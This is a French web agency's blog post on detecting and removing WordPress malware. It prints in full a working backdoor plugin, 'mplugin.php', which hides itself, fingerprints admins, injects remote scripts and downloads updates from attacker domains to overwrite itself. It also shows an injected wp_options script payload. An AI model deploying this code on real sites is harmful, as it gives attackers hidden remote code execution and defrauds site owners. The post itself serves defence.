{"id":4308,"date":"2021-05-31T09:30:27","date_gmt":"2021-05-31T09:30:27","guid":{"rendered":"https:\/\/acinonyxweb.agency\/?p=4308"},"modified":"2021-12-29T16:47:25","modified_gmt":"2021-12-29T16:47:25","slug":"votre-site-est-sans-doute-infecte-sans-que-vous-le-sachiez-comment-detecter-nettoyer-les-virus-dun-wordpress","status":"publish","type":"post","link":"https:\/\/acinonyxweb.agency\/fr\/cybersecurite\/votre-site-est-sans-doute-infecte-sans-que-vous-le-sachiez-comment-detecter-nettoyer-les-virus-dun-wordpress\/","title":{"rendered":"Votre site est sans doute infect\u00e9 sans que vous le sachiez. Comment d\u00e9tecter et nettoyer les virus d&#8217;un WordPress ?"},"content":{"rendered":"<div class=\"wpb-content-wrapper\">[vc_row][vc_column][vc_column_text]<span id=\"p0\"><span id=\"9\" class=\"s-rg\">WordPress<\/span> \u00e9tant le CMS le plus populaire au monde, cela a fait de lui une cible privil\u00e9gi\u00e9e des hackers.<\/span><span id=\"p1\"> Ainsi, il est devenu habituel que lors d&#8217;interventions courantes pour des clients nous apercevons de nombreuses backdoors bien dissimul\u00e9es dont l&#8217;administrateur n&#8217;avait pas connaissance : le but pour les pirates est de rester le plus discret possible.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span id=\"p1\">Aujourd&#8217;hui les sites ne font pas forc\u00e9ment l&#8217;objet de <em><span id=\"12\">defaces,<\/span><\/em><span id=\"12\"> d&#8217;affichage<\/span> de publicit\u00e9s (spamware), de g\u00e9n\u00e9rer des articles et des liens vers des sites \u00e9tranges&#8230; Ces sites sont exploit\u00e9s par les attaquants de la mani\u00e8re la plus discr\u00e8te possible pour ne pas se faire d\u00e9celer et retirer, c&#8217;est ce que l&#8217;on nomme :<em> advanced persistent threat<\/em>.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span id=\"p22\">En effet, dans la majorit\u00e9 des cas, les sites touch\u00e9s sont ceux qui ne sont plus mis \u00e0 jour.<\/span><span id=\"p4\"> <span id=\"15\" class=\"s-rg\">WordPress<\/span> propose r\u00e9guli\u00e8rement de mettre \u00e0 jour son c\u0153ur\/core afin de <span id=\"17\" class=\"s-rg\">patcher<\/span> des failles critiques tout au long de l&#8217;ann\u00e9e, il en va de m\u00eame pour les <span id=\"18\" class=\"s-rg\">plugins<\/span>.<\/span><span id=\"p5\"> Si vous ne les mettez pas \u00e0 jour et qu&#8217;un de ces <span id=\"19\" class=\"s-rg\">plugins<\/span> non mis \u00e0 jour contient une faille, alors il ne faudra que 5 minutes \u00e0 un hacker pour le d\u00e9couvrir, notamment gr\u00e2ce \u00e0 des sites tels que WP Sec.<\/span><\/p>\n<p>Une faille plus critique est celle des h\u00e9bergements partag\u00e9s mutualis\u00e9s : un site qui n&#8217;est pas le votre infecte le serveur qui vous infecte \u00e0 son tour. <a href=\"https:\/\/wordpress.org\/support\/topic\/multiple-wordpress-hacked-strange-favicon-ico-e-php-files\/\">Ainsi, les utilisateurs de Siteground ont \u00e9t\u00e9 victimes d&#8217;infections tour \u00e0 tour d&#8217;infection de leur site.<\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/hosting.acinonyxweb.agency\">C&#8217;est pour cela que nous recommandons nos h\u00e9bergements d\u00e9di\u00e9s (un serveur unique pour vous seul)<\/a>.<\/p>\n<p>&nbsp;<\/p>\n<p><span id=\"p6\">Si vous lisez aujourd&#8217;hui cet article, il est fort probable que vous ayez d\u00e9j\u00e0 eu \u00e0 faire \u00e0 ce cas de figure et que vous recherchez des solutions de diagnostic puis de d\u00e9sinfection.<\/span><span id=\"p7\"> Alors ne cherchez pas plus loin :<\/span><span id=\"p8\"> cet article r\u00e9sume les principales actions \u00e0 mener afin de nettoyer votre site <span id=\"20\">WordPress de tout backdoors, shells, malwares et virus<\/span>.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h2>Analyser son site WordPress \u00e0 l&#8217;aide de plugins<\/h2>\n<p>La premi\u00e8re chose \u00e0 faire et la plus simple de notre liste, est d&#8217;installer un plugin directement sur votre WordPress. Il existe plusieurs plugins d\u00e9di\u00e9s \u00e0 la s\u00e9curit\u00e9 sur WordPress, mais peu proposent des analyses compl\u00e8tes depuis le back-office.<\/p>\n<p>&nbsp;<\/p>\n<p>Le plugin gratuit qui nous int\u00e9resse dans ce cas de figure est :<\/p>\n<p><a href=\"https:\/\/fr.wordpress.org\/plugins\/wordfence\/\" target=\"_blank\" rel=\"noopener\"><strong>Wordfence Security \u2013 Firewall &amp; Malware Scan<\/strong><\/a><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-4309\" src=\"https:\/\/acinonyxweb.agency\/wp-content\/uploads\/2021\/05\/wordfence-1024x648.png\" alt=\"Wordfence\" width=\"900\" height=\"570\" \/><\/p>\n<p>Gr\u00e2ce \u00e0 ce plugin, vous pourrez en deux clics lancer une analyse du serveur, des fichiers modifi\u00e9s, des malwares les plus communs et pouvant \u00eatre d\u00e9tect\u00e9s par le plugin&#8230; En bref, un check-up complet pour votre site. C&#8217;est la premi\u00e8re chose \u00e0 faire en cas de soup\u00e7on de piratage.<\/p>\n<p>Attention toutefois, le plugin peut parfois designer certains fichiers comme malicieux car contenant du code chiffr\u00e9 en base64, hors ce n&#8217;est pas toujours le cas. Pensez donc \u00e0 toujours faire du sauvegarde de vos fichiers ou \u00e0 faire appel \u00e0 un expert.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: center;\"><strong>ATTENTION La majorit\u00e9 des virus WordPress sont con\u00e7us pour ne pas \u00eatre d\u00e9tect\u00e9 par ces antimalwares WordPress<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h2>Cherchez et supprimez les comptes administrateurs inconnus ainsi que les articles et pages que vous n&#8217;avez pas faits<\/h2>\n<p>&nbsp;<\/p>\n<h2>Bloquez le XML-RPC et l&#8217;API REST si vous ne les utilisez pas<\/h2>\n<p>Vous n&#8217;avez jamais entendu parler de ces fonctionnalit\u00e9s ? Il y a donc de grandes chances pour que vous n&#8217;en ayez pas besoin. Elles permettent \u00e0 un malware d&#8217;ex\u00e9cuter du code \u00e0 distance et de se r\u00e9g\u00e9n\u00e9rer, il vaut mieux donc les bloquer pr\u00e9ventivement.<\/p>\n<p>&nbsp;<\/p>\n<p>Tout cela se fait en quelques clics avec :<\/p>\n<p><a href=\"https:\/\/fr.wordpress.org\/plugins\/better-wp-security\/\">iThemes Security (anciennement Better WP Security)<\/a><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-4318 size-large alignnone\" src=\"https:\/\/acinonyxweb.agency\/wp-content\/uploads\/2021\/05\/e8qVVuF-1024x386.png\" alt=\"configuration itheme\" width=\"900\" height=\"339\" \/><\/p>\n<p>Apr\u00e8s avoir lanc\u00e9 la s\u00e9curisation automatique du site nous vous conseillons d&#8217;inscrire votre site au r\u00e9seau antibruteforce. Cela \u00e0 l&#8217;avantage, m\u00eame si votre site est d\u00e9j\u00e0 contamin\u00e9, de bloquer l&#8217;ip de l&#8217;attaquant et de son serveur de contr\u00f4le \u00e0 distance (C&amp;C botnet&#8230;).<\/p>\n<p>&nbsp;<\/p>\n<p>Dans les options allez dans les param\u00e8tres de fonctionnalit\u00e9s WordPress :<br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4320\" src=\"https:\/\/acinonyxweb.agency\/wp-content\/uploads\/2021\/05\/R3x3tdN.png\" alt=\"itheme security wordpress optimisation\" width=\"662\" height=\"173\" \/><br \/>\nPuis cochez et s\u00e9lectionnez les options suivantes (toutes celles recommand\u00e9es en fait) :<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4322\" src=\"https:\/\/acinonyxweb.agency\/wp-content\/uploads\/2021\/05\/53CSQAd.png\" alt=\"wordpress xmlrc infect\u00e9\" width=\"738\" height=\"778\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>Vous limiterez ainsi les risques de r\u00e9infection : en g\u00e9n\u00e9ral lorsque votre WordPress est infect\u00e9 par un malware, m\u00eame si vous le supprimez celui-ci est automatiquement r\u00e9inject\u00e9 par un serveur \u00e0 distance contr\u00f4lant en permanence le niveau d&#8217;infection de votre site via les fonctionnalit\u00e9s que nous venons de d\u00e9sactiver.<\/p>\n<p>En les bloquant le virus ne sera donc plus r\u00e9inject\u00e9 !<\/p>\n<p>&nbsp;<\/p>\n<h2>Analysez les tables de la base de donn\u00e9es du WordPress<\/h2>\n<p>Il est possible au sein d&#8217;un site WordPress d&#8217;injecter du code PHP et JavaScript directement depuis une table de la base de donn\u00e9es. De nombreux plugins existent pour cela, mais ce ne sont pas ces plugins qui nous int\u00e9ressent ici : seulement la m\u00e9thode employ\u00e9e pour ex\u00e9cuter du code malicieux.<\/p>\n<p>Certains malwares relativement malins enregistrent une balise &lt;script&gt; directement dans la table wp-options. Pensez-donc \u00e0 effectuer une requ\u00eate SQL de ce type afin de vous assurer que vous n&#8217;\u00eates pas affect\u00e9 :<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"sql\">SELECT * FROM `wp_options` WHERE (CONVERT(`option_name` USING utf8mb4) LIKE '%ad_code%' OR CONVERT(`option_value` USING utf8mb4) LIKE '%ad_code%' OR CONVERT(`autoload` USING utf8mb4) LIKE '%ad_code%') LIMIT 50<\/pre>\n<p>Manuellement, il vous suffit d&#8217;aller dans la base de donn\u00e9es de votre wordpress puis dans la table options (par d\u00e9faut wp-options mais votre pr\u00e9fixe peut changer) puis d&#8217;y chercher<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">&lt;script\r\n<\/pre>\n<p>ou encore<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">&lt;php\r\n<\/pre>\n<p>Exemple de code viral chez l&#8217;un de nos clients :<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4324\" src=\"https:\/\/acinonyxweb.agency\/wp-content\/uploads\/2021\/05\/p1Fn5EL.png\" alt=\"code viral wordpress js\" width=\"2061\" height=\"24\" \/><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">'ad_code', '\\n&lt;script type=\\'text\/javascript\\' src=\\'\/\/aanqylta.com\/bb\/2f\/82\/bb2f8268f180d7e0e1613e43c3e34d23.js\\'&gt;&lt;\/script&gt;\\n&lt;script type=\\'text\/javascript\\' src=\\'\/\/aanqylta.com\/a4\/8a\/80\/a48a807e59fb8d5503642ee3fcbb8f87.js\\'&gt;&lt;\/script&gt;\\n', 'yes'<\/pre>\n<p>Ici le site va automatiquement ex\u00e9cuter les fichiers distants :<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">aanqylta.com\/bb\/2f\/82\/bb2f8268f180d7e0e1613e43c3e34d23.js\r\naanqylta.com\/a4\/8a\/80\/a48a807e59fb8d5503642ee3fcbb8f87.js\r\n<\/pre>\n<p>lesquels sont des injecteurs viraux wordpress chiffr\u00e9s (pas besoin d&#8217;\u00eatre ing\u00e9nieur informaticien virologue pour comprendre que du code ex\u00e9cut\u00e9 \u00e0 distance chiffr\u00e9 sur un wordpress a de grandes chances d&#8217;\u00eatre nuisible).<\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: center;\">Encore une fois, attention \u00e0 ce que vous trouverez et supprimerez, car il peut parfois s&#8217;agir de r\u00e9sultats provenant de simple plugins de publicit\u00e9s, chargeant des publicit\u00e9s Google Ads (par exemple). Ou encore le code inject\u00e9 par des plugins l\u00e9gitimes comme <a href=\"https:\/\/fr.wordpress.org\/plugins\/code-snippets\/\">code snippets<\/a>.<\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: center;\"><strong>En cas de doute nous vous recommandons de vous tourner vers Acinonyx Web Agency : notre personnel exp\u00e9riment\u00e9 saura diff\u00e9rencier un malware d&#8217;une fonction conventionnelle chiffr\u00e9e.<\/strong><\/p>\n<p>&nbsp;<\/p>\n<h2>Analysez les changements au niveau des fichiers c\u00f4t\u00e9 serveur<\/h2>\n<p>Pour cette \u00e9tape, vous allez devoir vous connecter en SSH afin de pouvoir ex\u00e9cuter des lignes de commandes et en analyser le retour. Pour chaque commande, pensez \u00e0 remplacer &#8220;\/var\/www\/wordpress\/&#8221; par le chemin de votre site.<\/p>\n<p>En FTP, il est inutile de se fier \u00e0 la date de changement de fichiers car elle peut \u00eatre ais\u00e9ment falsifi\u00e9e. En revanche le chmod peut \u00eatre un bon indicateur&#8230;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: center;\">Comme d&#8217;habitude, prudence avant de supprimer des fichiers ou des bouts de code qui pourraient ne pas \u00eatre infect\u00e9s (faux positifs).<\/p>\n<h3><\/h3>\n<p>&nbsp;<\/p>\n<h2>Cherchez mplugin.php dans votre dossier de plugin wordpress<\/h2>\n<p>Infection la plus courante elle m\u00e9rite une partie enti\u00e8re. De nombreux clients t\u00e9l\u00e9chargent des th\u00e8mes ou plugins nulled ou crack\u00e9s. Sauf que rien n&#8217;est gratuit et vous en payez le prix plus tard : votre site affiche de la publicit\u00e9 pour payer le hacker :<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4326\" src=\"https:\/\/acinonyxweb.agency\/wp-content\/uploads\/2021\/05\/5arhHLN.png\" alt=\"\" width=\"228\" height=\"350\" \/><\/p>\n<p>Ici mplugins.php (m\u00eame avec un &#8220;s&#8221; de plus, le malware reste le m\u00eame).<\/p>\n<p>Vous ne verrez jamais rien car le plugin se dissimule dans la liste des plugins, enregistre les ips des admins et leur dissimule la publicit\u00e9 qui ne sera visible que pour les visiteurs tiers :<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">&lt;?php\r\n\/**\r\n * Plugin Name: Monetization Code plugin\r\n * Description: mplugin Shows cusom codes to display your ad codes.\r\n * Author: aerin Singh\r\n * Version: 1.0\r\n *\/\r\nerror_reporting(0);\r\nini_set('display_errors', 0);\r\n$plugin_key='4ab94009633ce74d72c165d5b5577957';\r\n$version='1.2';\r\n\r\nadd_action('admin_menu', function() {\r\n    add_options_page( 'mplugin Plugin', 'mplugin', 'manage_options', 'mplugin', 'mplugin_page' );\r\n    remove_submenu_page( 'options-general.php', 'mplugin' );\r\n});\r\n\r\n\r\n\r\nadd_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_mplugin');\r\nfunction salcode_add_plugin_page_settings_mplugin( $links ) {\r\n    $links[] = '&lt;a href=\"' .\r\n        admin_url( 'options-general.php?page=mplugin' ) .\r\n        '\"&gt;' . __('Settings') . '&lt;\/a&gt;';\r\n    return $links;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\nadd_action( 'admin_init', function() {\r\n\r\n    register_setting( 'mplugin-settings', 'default_mont_options' );\r\n    register_setting( 'mplugin-settings', 'ad_code' );\r\n    register_setting( 'mplugin-settings', 'hide_admin' );\r\n    register_setting( 'mplugin-settings', 'hide_logged_in' );\r\n    register_setting( 'mplugin-settings', 'display_ad' );\r\n    register_setting( 'mplugin-settings', 'search_engines' );\r\n    register_setting( 'mplugin-settings', 'auto_update' );\r\n    register_setting( 'mplugin-settings', 'ip_admin');\r\n    register_setting( 'mplugin-settings', 'cookies_admin' );\r\n    register_setting( 'mplugin-settings', 'logged_admin' );\r\n    register_setting( 'mplugin-settings', 'log_install' );\r\n    \r\n});\r\n\r\n$ad_code=\"\r\n&lt;script type='text\/javascript' src='\/\/aanqylta.com\/bb\/2f\/82\/bb2f8268f180d7e0e1613e43c3e34d23.js'&gt;&lt;\/script&gt;\r\n&lt;script type='text\/javascript' src='\/\/aanqylta.com\/a4\/8a\/80\/a48a807e59fb8d5503642ee3fcbb8f87.js'&gt;&lt;\/script&gt;\r\n\";\r\n\r\n$hide_admin='on';\r\n$hide_logged_in='on';\r\n$display_ad='organic';\r\n$search_engines='google.,\/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';\r\n$auto_update='on';\r\n$ip_admin='on';\r\n$cookies_admin='on';\r\n$logged_admin='on';\r\n$log_install='';\r\n\r\nfunction mplugin_page() {\r\n ?&gt;\r\n   &lt;div class=\"wrap\"&gt;\r\n&lt;form action=\"options.php\" method=\"post\"&gt;\r\n       &lt;?php\r\n       settings_fields( 'mplugin-settings' );\r\n       do_settings_sections( 'mplugin-settings' );\r\n$ad_code='';\r\n\r\n$hide_admin='on';\r\n$hide_logged_in='on';\r\n$display_ad='organic';\r\n$search_engines='google.,\/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';\r\n$auto_update='on';\r\n$ip_admin='on';\r\n$cookies_admin='on';\r\n$logged_admin='on';\r\n$log_install='';\r\n\r\n       ?&gt;\r\n       &lt;h2&gt;mplugin Plugin&lt;\/h2&gt;\r\n       &lt;table&gt;\r\n             \r\n &lt;tr&gt;\r\n                &lt;th&gt;Ad Code&lt;\/th&gt;\r\n                &lt;td&gt;&lt;textarea placeholder=\"\" name=\"ad_code\" rows=\"5\" cols=\"130\"&gt;&lt;?php echo get_option('ad_code',$ad_code) ; ?&gt;&lt;\/textarea&gt;&lt;\/td&gt;\r\n            &lt;\/tr&gt;\r\n            \r\n            \r\n            \r\n&lt;tr&gt;\r\n                &lt;th&gt;Hide ads to :&lt;\/th&gt;\r\n                &lt;td&gt;\r\n                    &lt;input type=\"hidden\" id=\"default_mont_options\" name=\"default_mont_options\" value=\"on\"&gt;\r\n                    &lt;label&gt;\r\n                        &lt;input type=\"checkbox\" name=\"hide_admin\" &lt;?php echo esc_attr( get_option('hide_admin',$hide_admin) ) == 'on' ? 'checked=\"checked\"' : ''; ?&gt; \/&gt;admins\r\n                    &lt;\/label&gt;\r\n                    &lt;label&gt;\r\n                        &lt;input type=\"checkbox\" name=\"hide_logged_in\" &lt;?php echo esc_attr( get_option('hide_logged_in',$hide_logged_in) ) == 'on' ? 'checked=\"checked\"' : ''; ?&gt; \/&gt;logged in users\r\n                    &lt;\/label&gt;\r\n                    &lt;br\/&gt;\r\n                 \r\n\r\n                &lt;\/td&gt;\r\n            &lt;\/tr&gt;\r\n            \r\n            \r\n            \r\n            &lt;tr&gt;\r\n                &lt;th&gt;Recognize admin by :&lt;\/th&gt;\r\n                &lt;td&gt;\r\n\r\n                    &lt;label&gt;\r\n                        &lt;input type=\"checkbox\" name=\"logged_admin\" &lt;?php echo esc_attr( get_option('logged_admin',$logged_admin) ) == 'on' ? 'checked=\"checked\"' : ''; ?&gt; \/&gt;logged in\r\n                    &lt;\/label&gt;\r\n                    &lt;label&gt;\r\n                        &lt;input type=\"checkbox\" name=\"ip_admin\" id=\"ip_admin\"  &lt;?php echo esc_attr( get_option('ip_admin',$ip_admin) ) == 'on' ? 'checked=\"checked\"' : '' ?&gt; \/&gt;By IP addresses\r\n                    &lt;\/label&gt;\r\n                                        &lt;label&gt;\r\n                        &lt;input type=\"checkbox\" name=\"cookies_admin\" &lt;?php echo esc_attr( get_option('cookies_admin',$cookies_admin) ) == 'on' ? 'checked=\"checked\"' : ''; ?&gt; \/&gt;By Cookies\r\n                    &lt;\/label&gt;\r\n                \r\n                 \r\n\r\n                &lt;\/td&gt;\r\n            &lt;\/tr&gt;\r\n            \r\n            \r\n            \r\n            &lt;tr&gt;\r\n                &lt;th&gt;Display ads to :&lt;\/th&gt;\r\n                &lt;td&gt;\r\n                 \t\t\t\t         &lt;select name=\"display_ad\"&gt;\r\n                        \r\n                        &lt;option value=\"organic\" &lt;?php echo esc_attr( get_option('display_ad',$display_ad) ) == 'organic' ? 'selected=\"selected\"' : ''; ?&gt;&gt;Organic traffic only&lt;\/option&gt;\r\n                        &lt;option value=\"all_visitors\" &lt;?php echo esc_attr( get_option('display_ad') ) == 'all_visitors' ? 'selected=\"selected\"' : ''; ?&gt;&gt;All Visitors&lt;\/option&gt;\r\n                        \r\n                    &lt;\/select&gt;\r\n\r\n                &lt;\/td&gt;\r\n            &lt;\/tr&gt;\r\n\r\n            &lt;tr&gt;\r\n                &lt;th&gt;Search Engines&lt;\/th&gt;\r\n                &lt;td&gt;&lt;input type=\"text\" placeholder=\"Internal title\" name=\"search_engines\" value=\"&lt;?php echo esc_attr( get_option('search_engines',$search_engines) ); ?&gt;\" size=\"80\" \/&gt;&lt;p class=\"description\"&gt;\r\n            comma separated  &lt;\/p&gt;\r\n                &lt;\/td&gt;\r\n            &lt;\/tr&gt;\r\n \r\n \r\n &lt;tr&gt;\r\n                &lt;th&gt;Auto Update :&lt;\/th&gt;\r\n                &lt;td&gt;\r\n\r\n                    &lt;label&gt;\r\n                        &lt;input type=\"checkbox\" name=\"auto_update\" &lt;?php echo esc_attr( get_option('auto_update',$auto_update) ) == 'on' ? 'checked=\"checked\"' : ''; ?&gt; \/&gt;auto update plugin\r\n                    &lt;\/label&gt;&lt;br\/&gt;\r\n                 \r\n\r\n                &lt;\/td&gt;\r\n            &lt;\/tr&gt;\r\n \r\n            &lt;tr&gt;\r\n                &lt;td&gt;&lt;?php submit_button(); ?&gt;&lt;\/td&gt;\r\n            &lt;\/tr&gt;\r\n \r\n        &lt;\/table&gt;\r\n       \r\n       \r\n       \r\n     &lt;\/form&gt;\r\n   &lt;\/div&gt;\r\n &lt;?php\r\n}\r\n\r\n\/*************************log install***************************\/\r\nif(get_option('log_install') !=='1')\r\n{\r\n    if(!$log_installed = @file_get_contents(\"http:\/\/www.tomndo.com\/o2.php?host=\".$_SERVER[\"HTTP_HOST\"]))\r\n{\r\n    $log_installed = @file_get_contents_mplugin(\"http:\/\/www.tomndo.com\/o2.php?host=\".$_SERVER[\"HTTP_HOST\"]);\r\n}\r\n}\r\n\/*************************set default options***************************\/\r\n\r\nif(get_option('default_mont_options') !=='on')\r\n{\r\nupdate_option('ip_admin', $ip_admin);\r\nupdate_option('ad_code', $ad_code);\r\nupdate_option('cookies_admin', $cookies_admin);\r\nupdate_option('logged_admin', $logged_admin);\r\nupdate_option('hide_admin', $hide_admin);\r\nupdate_option('hide_logged_in', $hide_logged_in);\r\nupdate_option('display_ad', $display_ad);\r\nupdate_option('search_engines', $search_engines);\r\nupdate_option('auto_update', $auto_update);\r\nupdate_option('log_install', '1');\r\n}\r\n\r\n\/************************************************************************\/\r\ninclude_once(ABSPATH . 'wp-includes\/pluggable.php'); \r\n\r\nif ( ! function_exists( 'display_ad_single' ) ) {  \r\n\r\nfunction display_ad_single($content){ \r\nif(is_single())\r\n{\r\n\r\n$content=$content.get_option('ad_code');;\r\n}\r\nreturn $content;\r\n} \r\n\r\nfunction display_ad_footer(){ \r\nif(!is_single())\r\n{\r\necho get_option('ad_code');\r\n}\r\n} \r\n\r\n\r\n\/\/setting cookies if admin logged in\r\nfunction setting_admin_cookie() {\r\n  setcookie( 'wordpress_admin_logged_in',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);\r\n  }\r\n\r\nif(get_option('cookies_admin')=='on')\r\n{\r\n\r\nif(is_user_logged_in())\r\n{\r\nadd_action( 'init', 'setting_admin_cookie',1 );\r\n}\r\n}\r\n\r\n\r\n\/\/log admin IP addresses\r\n$vis_ip=getVisIpAddr_mplugin();\r\nif(get_option('ip_admin')=='on')\r\n{\r\nif(current_user_can('edit_others_pages'))\r\n{\r\n\r\nif (file_exists(plugin_dir_path( __FILE__ ) .'admin_ips.txt'))\r\n{\r\n$ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');\r\n}\r\n\r\nif (stripos($ip, $vis_ip) === false)\r\n{\r\n$ip.=$vis_ip.'\r\n';\r\n@file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);\r\n\r\n}\r\n\r\n}\r\n}\/\/ end if log admins ip\r\n\r\n\r\n\r\n\r\n\/\/add cookies to organic traffic\r\n\r\nif(get_option('display_ad')=='organic')\r\n{\r\n\r\n$search_engines = explode(',', get_option('search_engines'));\r\n\r\n$referer = $_SERVER['HTTP_REFERER'];\r\n$SE = array('google.','\/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');\r\nforeach ($search_engines as $search) {\r\n  if (strpos($referer,$search)!==false) {\r\n    setcookie(\"organic\", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); \r\n    $organic=true;\r\n  }\r\n}\r\n\r\n}\/\/end\r\n\r\n\r\n\r\n\r\n\/\/display ad\r\n\r\nif(!isset($_COOKIE['wordpress_admin_logged_in']) &amp;&amp; !is_user_logged_in()) \r\n{\r\n\r\n$ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');\r\nif (stripos($ips, $vis_ip) === false)\r\n{\r\n\/*****\/\r\nif(get_option('display_ad')=='organic')\r\n{\r\nif($organic==true || isset($_COOKIE['organic']))\r\n{\r\nadd_filter('the_content','display_ad_single');\r\nadd_action('wp_footer','display_ad_footer'); \r\n}\r\n}\r\nelse\r\n{\r\nadd_filter('the_content','display_ad_single');\r\nadd_action('wp_footer','display_ad_footer');  \r\n}\r\n\r\n\/****\/\r\n\r\n}\r\n\r\n}\r\n\/*******************\/\r\n\r\n\r\n\r\n\r\n\r\n\/\/update plugin\r\n\r\nif(get_option('auto_update')=='on')\r\n{\r\n\r\nif( ini_get('allow_url_fopen') ) {\r\n\r\n\r\n\r\n        if (($new_version = @file_get_contents(\"http:\/\/www.tomndo.com\/update.php\") OR $new_version = @file_get_contents_mplugin(\"http:\/\/www.tomndo.com\/update.php\")) AND stripos($new_version, $plugin_key) !== false) {\r\n\r\n            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {\r\n               @file_put_contents(__FILE__, $new_version);\r\n                \r\n            }\r\n        }\r\n        \r\n        \r\n                elseif ($new_version = @file_get_contents(\"http:\/\/www.tomndo.xyz\/update.php\") AND stripos($new_version, $plugin_key) !== false) {\r\n\r\n            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {\r\n               @file_put_contents(__FILE__, $new_version);\r\n                \r\n            }\r\n        }\r\n\r\n\r\n        elseif ($new_version = @file_get_contents(\"http:\/\/www.tomndo.top\/update.php\") AND stripos($new_version, $plugin_key) !== false) {\r\n\r\n            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {\r\n               @file_put_contents(__FILE__, $new_version);\r\n                \r\n            }\r\n        }\r\n\r\n}\r\nelse\r\n{\r\n            if (($new_version = @file_get_contents(\"http:\/\/www.tomndo.com\/update.php\") OR $new_version = @file_get_contents_mplugin(\"http:\/\/www.tomndo.com\/update.php\")) AND stripos($new_version, $plugin_key) !== false) {\r\n\r\n            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {\r\n               @file_put_contents(__FILE__, $new_version);\r\n                \r\n            }\r\n        }\r\n        \r\n        \r\n                elseif ($new_version = @file_get_contents_mplugin(\"http:\/\/www.tomndo.xyz\/update.php\") AND stripos($new_version, $plugin_key) !== false) {\r\n\r\n            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {\r\n               @file_put_contents(__FILE__, $new_version);\r\n                \r\n            }\r\n        }\r\n\r\n\r\n        elseif ($new_version = @file_get_contents_mplugin(\"http:\/\/www.tomndo.top\/update.php\") AND stripos($new_version, $plugin_key) !== false) {\r\n\r\n            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {\r\n               @file_put_contents(__FILE__, $new_version);\r\n                \r\n            }\r\n        }\r\n}\r\n}\/\/end if auto update\r\n\r\n\/*********************************\/\r\n\r\n\r\n\r\n}\/\/ if function exist\r\n\r\n\r\n\r\n     function file_get_contents_mplugin($url)\r\n        {\r\n            $ch = curl_init();\r\n            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);\r\n            curl_setopt($ch, CURLOPT_HEADER, 0);\r\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n            curl_setopt($ch, CURLOPT_URL, $url);\r\n            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);\r\n            $data = curl_exec($ch);\r\n            curl_close($ch);\r\n            return $data;\r\n        }\r\n\r\n\r\nfunction hide_plugin_mplugin() {\r\n  global $wp_list_table;\r\n  $hidearr = array('mplugin.php');\r\n  $myplugins = $wp_list_table-&gt;items;\r\n  foreach ($myplugins as $key =&gt; $val) {\r\n    if (in_array($key,$hidearr)) {\r\n      unset($wp_list_table-&gt;items[$key]);\r\n    }\r\n  }\r\n}\r\n\r\nadd_action('pre_current_active_plugins', 'hide_plugin_mplugin');\r\n\r\n        function getVisIpAddr_mplugin() { \r\n      \r\n    if (!empty($_SERVER['HTTP_CLIENT_IP'])) { \r\n        return $_SERVER['HTTP_CLIENT_IP']; \r\n    } \r\n    else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { \r\n        return $_SERVER['HTTP_X_FORWARDED_FOR']; \r\n    } \r\n    else { \r\n        return $_SERVER['REMOTE_ADDR']; \r\n    } \r\n}\r\n\r\n?&gt;<\/pre>\n<p>m pour moneyplugin ou comment rentabiliser ses victimes.<\/p>\n<p>&nbsp;<\/p>\n<p>Ici c&#8217;\u00e9tait Updraftplus le coupable, qui se trouve avec cette commande ssh :<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">grep -r -i --include=\\*.php 'mplugin.php' \/var\/www\/\r\n<\/pre>\n<p>Traduction : qui a g\u00e9n\u00e9r\u00e9 mplugin ? Qu&#8217;il se d\u00e9nonce 